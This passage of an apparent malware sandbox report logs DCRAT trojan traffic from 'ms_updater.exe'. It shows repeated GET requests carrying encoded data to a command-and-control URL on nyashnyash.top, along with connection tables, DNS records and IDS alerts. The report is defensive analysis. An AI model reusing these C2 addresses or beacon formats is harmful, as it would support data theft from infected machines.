pWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiI0ETZ2kTOyEGZzczNkBzM1QmZ4ETOlNWMzgTMxAjNmdjNiVGMwUWYzIiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
2124
ms_updater.exe
GET
200
188.114.96.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?2riXKVlgV1=JUk18ntWeDto2yehI8yOvj&VLkpjdj5=nrkCHcyD3VUNJCp&qydhhm6jGOqX8J25HR=KN&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyYDN3MTN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W&a05939b54e910a520ed16f4659e1d224=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
unknown
text
104 b
unknown
2124
ms_updater.exe
GET
200
188.114.96.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?2riXKVlgV1=JUk18ntWeDto2yehI8yOvj&VLkpjdj5=nrkCHcyD3VUNJCp&qydhhm6jGOqX8J25HR=KN&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyYDN3MTN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W&a05939b54e910a520ed16f4659e1d224=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
unknown
text
104 b
unknown
2124
ms_updater.exe
GET
200
188.114.96.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?2riXKVlgV1=JUk18ntWeDto2yehI8yOvj&VLkpjdj5=nrkCHcyD3VUNJCp&qydhhm6jGOqX8J25HR=KN&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyYDN3MTN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&a05939b54e910a520ed16f4659e1d224=QX9JSUNJiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiIlZDOkFTNiZGNwMTOlFjYkljM4IDNlFjN2UDMwUWOlVzYlZWOkFmYlJiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
2124
ms_updater.exe
GET
200
188.114.96.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?2riXKVlgV1=JUk18ntWeDto2yehI8yOvj&VLkpjdj5=nrkCHcyD3VUNJCp&qydhhm6jGOqX8J25HR=KN&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyYDN3MTN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&60fcc970050c21131ef204c321f6004c=d1nIPBHRkxGeHJGakZUS2JFSjVjSzE1ZNhVWJBXUE9EcERGb4dkYoRmRJxmTYlVa1cVY25UbD5ENr9EMWdkYzZkMWdWUYplbShVYpBXUE9EcERGb4dkYoRmRJRDdyI2SwcGV2EFWaNHeXlFWCNEZ6ZlbjBDcRR0TwREZsh3RihGZGlkeWhkW2hGWatEMnRlNRhlWzh3VZhlQTFmdKNjYaBXUE9EcERGb4dkYoRmRJlmVyY1Z0ADVVBXUE9EcERGb4dkYoRmRJRXOHRWdGdUYRBXUE9EcERGb4dkYoRmRJlmVyY1ZVJTW1ZUbiBnSrNkT0s2TwY1RiNnRyY1Z0cVY1lTbVtEMnRlNRhlWzh3VZhlQ5FWdsdEV1lTbjVFcRR0TwREZsh3RihGZGlkcOhVWOZ0RkxWMrNkT0s2TwY1RiNnRyY1ZnJzYo5UbXtEMnRlNRhlWzh3VZhlQ5JWeW1mY2FzaD5ENr9EMWdkYzZkMWdWVtNmdOtmYwljMZxmUYFWTwFFRPBHRkxGeHJGakZUS6ZFSaZHaYJ1SwcGV2EFWaNHeXlFWCNlYxYVbjxGaHRmRwFFRPBHRkxGeHJGakZUS0ZlbjBjTXp1cWt2QORzaPBjVHJ2cGJjVnVVbjZnTFFmeGdkULBzZUZTUYp1c4dVWYJUaiBXOykFbShVZDBXUE9EcERGb4dkYoRmRJxmSzIGR1cVY250RkBnSrNkT0s2TwY1RiNnRyY1ZNdVY0lzRkJEcRR0TwREZsh3RihGZGlUNKNjY0pEWRtEMnRlNRhlWzh3VZhlQTpla1cVW1xWbRJiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
unknown
4
System
192.168.100.255:137
whitelisted
224.0.0.252:5355
unknown
2124
ms_updater.exe
104.20.67.143:443
pastebin.com
CLOUDFLARENET
unknown
2124
ms_updater.exe
188.114.96.3:80
355212cm.nyashnyash.top
CLOUDFLARENET
NL
unknown
3508
WerFault.exe
104.208.16.93:443
watson.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
2096
WerFault.exe
104.208.16.93:443
watson.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.67.143
  • 104.20.68.143
  • 172.67.34.170
shared
355212cm.nyashnyash.top
  • 188.114.96.3
  • 188.114.97.3
unknown
watson.microsoft.com
  • 104.208.16.93
whitelisted

Threats

PID
Process
Class
Message
1080
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
2124
ms_updater.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
2124
ms_updater.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
2124
ms_updater.exe
A Network Trojan was detected
ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
CC Checker AcTeam.rar